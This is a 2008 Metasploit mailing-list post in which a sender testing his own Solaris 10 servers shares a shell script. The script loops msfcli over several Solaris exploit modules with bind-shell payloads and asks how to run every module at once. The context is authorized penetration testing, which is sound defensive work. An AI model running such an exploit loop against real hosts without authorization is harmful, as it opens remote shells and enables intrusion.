Metasploit mailing list archives

try to exploit everything


From: mail2arthur at gmail.com (arthur)
Date: Fri, 25 Jul 2008 12:12:54 -0400

Hi All,

We are pentesting our Solaris 10 servers and so far I have built a script to call msfcli to try all the Solaris modules
(even Solaris 8/9, partial script below). However, the auditor would like to see us try ALL to make sure the server/app won't
go down after a silly hacker tries a wrong attack.

With RHOST set globally, is there any easy way to run all?

Thanks,

Arthur

...
APP=./msfcli
ADD="..."
PL1=cmd/unix/bind_perl
PL2=generic/shell_bind_tcp

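test_run()
{
  # Echo the command to the terminal and to the log file $FN (not set in
  # this excerpt), then run it under sudo, appending stdout and stderr
  # to the same log.
  echo "$*"

  echo "$*" >>"$FN"
  sudo "$@" >>"$FN" 2>&1
}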

for addr in $ADD ; do
  test_run $APP solaris/dtspcd/heap_noir RHOST=$addr C
  test_run $APP solaris/lpd/sendmail_exec RHOST=$addr PAYLOAD=$PL1 E 
  test_run $APP solaris/samba/lsa_transnames_heap RHOST=$addr PAYLOAD=$PL2 E 
  test_run $APP solaris/samba/trans2open RHOST=$addr PAYLOAD=$PL2 TARGET=0 E 
  test_run $APP solaris/sunrpc/sadmind_exec RHOST=$addr PAYLOAD=$PL1 E 
  test_run $APP solaris/sunrpc/ypupdated_exec RHOST=$addr PAYLOAD=$PL1 E 
  test_run $APP solaris/telnet/fuser RHOST=$addr PAYLOAD=$PL1 E 
  test_run $APP solaris/telnet/ttyprompt RHOST=$addr PAYLOAD=$PL1 E 
done
...